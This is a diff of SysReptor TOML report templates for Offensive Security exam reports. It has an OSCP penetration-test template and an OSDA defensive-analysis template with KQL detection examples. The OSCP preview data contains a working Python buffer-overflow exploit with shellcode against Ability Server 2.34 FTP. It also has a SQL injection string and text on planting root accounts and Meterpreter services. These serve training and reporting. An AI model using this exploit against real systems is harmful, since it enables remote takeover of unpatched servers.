After the trophies on both the lab network and exam network were completed, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
TODO Adapt as required
"""
required = true
[report_fields.infogathering]
type = "markdown"
label = "Information Gathering"
origin = "custom"
default = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Exam Network:**
* 172.16.203.133
* 172.16.203.134
* 172.16.203.135
* 172.16.203.136
TODO Adapt as required
"""
required = true
[report_fields.maintainaccess]
type = "markdown"
label = "Maintaining Access"
origin = "custom"
default = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
TODO Adapt as required
"""
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.recommendations]
type = "markdown"
label = "Recommendations"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
TODO Adapt as required
"""
required = true
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO appendix content"
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
TODO Adapt summary as required
"""
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "high-level_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
"recommendations",
]
[[report_sections]]
id = "methodology"
label = "Methodologies"
fields = [
"methodology",
"infogathering",
"serviceenum",
"penetration",
"maintainaccess",
"housecleaning",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target Name"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.ip_address]
type = "string"
label = "IP Address"
origin = "custom"
default = "TODO IP Address"
required = true
spellcheck = false
[finding_fields.serviceenum]
type = "markdown"
label = "Service Enumeration"
origin = "custom"
default = """
**Port Scan Results**
| IP Address | Ports Open |
| ------- | ------- |
| TODO | TODO **TCP:** **UDP:**
TODO
* `nmap -Pn -n 8.8.8.8 | grep open | cut -d/ -f1 | sed 'N;s/\\n/, /g'` for comma separated TCP ports
* `nmap -sU -Pn -n 8.8.8.8 | grep open | cut -d/ -f1 | sed 'N;s/\\n/, /g'` for comma separated UDP ports
**TODO further enumeration results**
"""
required = true
[finding_fields.initialaccess]
type = "markdown"
label = "Initial Access"
origin = "custom"
default = """
**Vulnerability Explation:** TODO
**Vulnerability Fix:** TODO
**Steps to reproduce the attack:** TODO
**Proof of Concept Code:** TODO
"""
required = true
[finding_fields.postexploitation]
type = "markdown"
label = "Post Exploitation"
origin = "custom"
default = "**System Proof Screenshot:** TODO"
required = true
[finding_fields.isActiveDirectory]
type = "boolean"
label = "is Active Directory Set?"
origin = "custom"
default = false
[finding_fields.privilegeescalation]
type = "markdown"
label = "Privilege Escalation"
origin = "custom"
default = """
**Vulnerability Explanation:** TODO
**Vulnerability Fix:** TODO
**Steps to reproduce the attack:** TODO
**Proof of Concept Code:** TODO
"""
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSCP Penetration Test Report"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
methodology = "{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found."
penetration = "The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems."
report_date = "2022-07-29"
serviceenum = "The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed."
housecleaning = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
"""
infogathering = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Exam Network:**
* 172.16.203.133
* 172.16.203.134
* 172.16.203.135
* 172.16.203.136
"""
maintainaccess = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
"""
report_version = "1.0"
recommendations = "{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date."
appendix_sections = []
highlevel_summary = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
"""
firstname = "John"
lastname = "Doe"
[[report_preview_data.findings]]
title = "Target #1"
cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
id = "c7f12f17-96bf-4899-b10f-2b1a513382e8"
ip_address = "172.16.203.134"
serviceenum = """
**Port Scan Results**
| IP Address | Ports Open |
| ------- | ------- |
| 172.16.203.134 | **TCP:** 22, 79, 80, 105, 106, 110, 135, 139, 143, 445, 2224, 3306, 3389 |
**FTP Enumeration**
Upon manual enumeration of the available FTP service, John noticed it was running an outdated version 2.3.4 that is prone to the remote buffer overflow vulnerability.
"""
initialaccess = """
**Vulnerability Explanation:** Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field. Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system.
**Vulnerability Fix:** The publishers of the Ability Server have issued a patch to fix this known issue. It can be found here: [http://www.code-crafters.com/abilityserver/](http://www.code-crafters.com/abilityserver/)
**Steps to reproduce the attack:** The operating system was different from the known public exploit. A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave John full administrative access over the system.
**Proof of Concept Code:**
```python highlight-manual
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow # Advanced, secure and easy to use FTP Server. # 21 Oct 2004 - muts ###################################
# D:\\BO>ability-2.34-ftp-stor.py ###################################
# D:\\data\\tools>nc -v 127.0.0.1 4444
# localhost [127.0.0.1] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# D:\\Program Files\\abilitywebserver> ###################################
import ftplib
from ftplib import FTP
import struct
print "\\n\\n################################"
print "\\nAbility Server 2.34 FTP STOR buffer Overflow" print "\\nFor Educational Purposes Only!\\n"
print "###################################"
# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"
sc = "\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66"
sc += "\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6"
sc += "\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba"
sc += "\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb"
sc += "\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc"
sc += "\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61"
sc += "\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70"
sc += "\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44"
sc += "\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7"
sc += "\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69"
sc += "\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9"
sc += "\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0"
sc += "\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3"
sc += "\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7"
sc += "\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0"
sc += "\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67"
sc += "\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1"
sc += "\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0"
sc += "\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88"
sc += "\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d"
sc += "\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95"
sc += "\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2"
# Change RET address if need be.
buffer = §§'\\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\\x42'*32+sc§§ # RET Windows 2000 Server SP4
#buffer = '\\x41'*970+struct.pack('<L', 0x7D17D737)+'\\x42'*32+sc # RET Windows XP SP2 try:
# Edit the IP, Username and Password.
ftp = FTP('§§127.0.0.1§§')
ftp.login('§§ftp§§','§§ftp§§')
print "\\nEvil Buffer sent..."
print "\\nTry connecting with netcat to port 4444 on the remote machine." except:
print "\\nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer)
except:
print "\\nDone."
```
"""
postexploitation = ""
isActiveDirectory = false
privilegeescalation = """
**Vulnerability Explation:** After establishing a foothold on target, John noticed there were several applications running locally, one of them, a custom web application on port 80 was prone to SQL Injection attacks. Using Chisel for port forwarding, John was able to access the web application. When performing the penetration test, John noticed error-based MySQL Injection on the taxid query string parameter. While enumerating table data, John was able to successfully extract the database root account login and password credentials that were unencrypted that also matched username and password accounts for the administrative user account on the system and John was able to log in remotely using RDP. This allowed for a successful breach of the operating system as well as all data contained on the system.
**Vulnerability Fix:** Since this is a custom web application, a specific update will not properly solve this issue. The application will need to be programmed to properly sanitize user-input
data, ensure that the user is running off of a limited user account, and that any sensitive data stored within the SQL database is properly encrypted. Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them.
**Steps to reproduce the attack:**
```
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE %root%"
```
"""
[[assets]]
id = "0b55fb94-e829-453b-9ef7-8d066210b83a"
name = "LICENSE"


@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.



@ -0,0 +1,703 @@
format = "projecttypes/v1"
id = "431ca4e2-14f4-41bc-a431-07e8002b45de"
name = "OSDA Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSDA Exam Documentation {.in-toc.numbered}
The Offensive Security Exam report contains all efforts that were conducted in order to pass the Offensive Security certification test. This report should contain all items that were used to pass the exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of security detection methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Defense Analyst.
## Objective {.in-toc.numbered}
The objective of this assessment is to perform detections and analysis on the simulated exam network in order to determine which attacker actions took place in each of the 10 phases.
An example page has already been created for you at the latter portions of this document that should demonstrate the amount of information and detail that is expected in the exam report. Use the sample report as a guideline to get you through the reporting.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* Overall High-Level Summary of level of compromise
* Detailed walkthrough of attacker actions in each phase
* Each finding with included screenshots, explanations, event / log entries, and KQL queries if applicable
</markdown>
<pagebreak />
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
<pagebreak />
</section>
<section>
<h1 id="findings" class="in-toc numbered">Phases</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-for="step in finding.steps">
<h3 class="in-toc numbered">{{ step.a_step_title }}</h3>
<markdown :text="step.b_step_details" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #005ad0;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSDA Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = """
TODO This report details and documents the attacks observed against the Offensive Security OSDA exam network.
The attacker organization started by performing a brute force against an internet accessible RDP server called APPSRV02 and obtained administrative access. This led to a complete compromise of the server.
Next the attacker performed lateral movement to the internal server APPSRV02 by reusing stolen credentials from APPSRV02, this also led to a complete compromise of APPSRV03.
[]
"""
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Phase"
origin = "core"
default = "TODO Phase Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.steps]
type = "list"
label = "Steps"
origin = "custom"
required = true
[finding_fields.steps.items]
type = "object"
label = ""
origin = "custom"
[finding_fields.steps.items.properties]
[finding_fields.steps.items.properties.a_step_title]
type = "string"
label = "Step Title"
origin = "custom"
default = "TODO step title"
required = true
spellcheck = false
[finding_fields.steps.items.properties.b_step_details]
type = "markdown"
label = "Step Details"
origin = "custom"
default = "TODO step details"
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSDA Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = """
TODO This report details and documents the attacks observed against the Offensive Security OSDA exam network.
The attacker organization started by performing a brute force against an internet accessible RDP server called APPSRV02 and obtained administrative access. This led to a complete compromise of the server.
Next the attacker performed lateral movement to the internal server APPSRV02 by reusing stolen credentials from APPSRV02, this also led to a complete compromise of APPSRV03.
[]
"""
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "Phase 1"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
id = "90a0038a-3649-4a37-8151-06c935a5a15e"
[[report_preview_data.findings.steps]]
a_step_title = "RDP Brute Force"
b_step_details = """
The initial indicator of an attack happening was the triggering of a pre-defined threshold rule called Possible RDP brute force as shown below.
![](/assets/name/image-590869.png)
By looking at how the rule was defined, it is triggered by more than 100 instances of event ID 4625, which is a failed logon. This could align with a brute force attack where the attacker makes use of a user and/or password list.
When we inspect some of the events that triggered the alert, as shown below, we notice that the server reporting the events is APPSRV02.
![](/assets/name/image-127195.png)
Given that an attacker may have attempted to brute force the server, we should search for a subsequent successful log on event to APPSRV02 to determine if they obtained access.
We do this with the following KQL query:
event.code : "4624" and NOT user.name : SYSTEM and NOT user.name : DWM-2
From this query we find the following event entry:
![](/assets/name/image-322213.png)
This shows that the user Peter did a successful logon to APPSRV02 shortly after the suspected brute force attack. The source IP of the logon event was 192.168.67.69 which means its not a local logon, but remotely.
At this point we have a strong suspicion that the account with the username Peter was compromised and a malicious actor obtained access to APPSRV02 coming from the IP address 192.168.67.69. We should escalate this to an incident and contact the user to verify whether this was a legitimate logon.
"""
[[report_preview_data.findings.steps]]
a_step_title = "Persistence"
b_step_details = """
After suspicion of a compromise, additional investigation should be performed. One area is looking for persistence and a common way attackers employ is through the registry.
To try and determine if this happed, we can use the KQL query:
process.name : "reg.exe"
As a result, we find the following event:
![](/assets/name/image-781171.png)
This shows that a registry change was performed. An entry for the Run key was added. The Run registry key is used when a user logs on to the computer and thus is often used for persistence.
In particular we notice that the file C:\\Windows\\System32\\update.exe will be executed when a user logs on to APPSRV02.
We should escalate this to investigate what the file update.exe is.
"""
[[report_preview_data.findings.steps]]
a_step_title = "Summary"
b_step_details = "In this phase we have strong suspicions that a malicious actor performed a brute force attack against APPSRV02 and managed to compromise the user account with the username “Peter”. Additionally, we suspect that persistence was set up through a Run key in the registry to execute the file “C:\\Windows\\System32\\update.exe”."
[[report_preview_data.findings]]
title = "Phase 2"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H"
id = "8a39146e-3b2c-4d93-b1d7-9f604092fae4"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 3"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
id = "7d3e1727-5993-44b8-b06c-89e97c3d35c0"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 4"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
id = "489071b1-0a42-47ca-aa31-0b3f7e5260cd"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 5"
cvss = "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
id = "cab9e74f-4735-4665-ad2f-f9a05ca84870"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 6"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
id = "cba6456f-02f1-4ce0-9b1e-88f8bca06430"
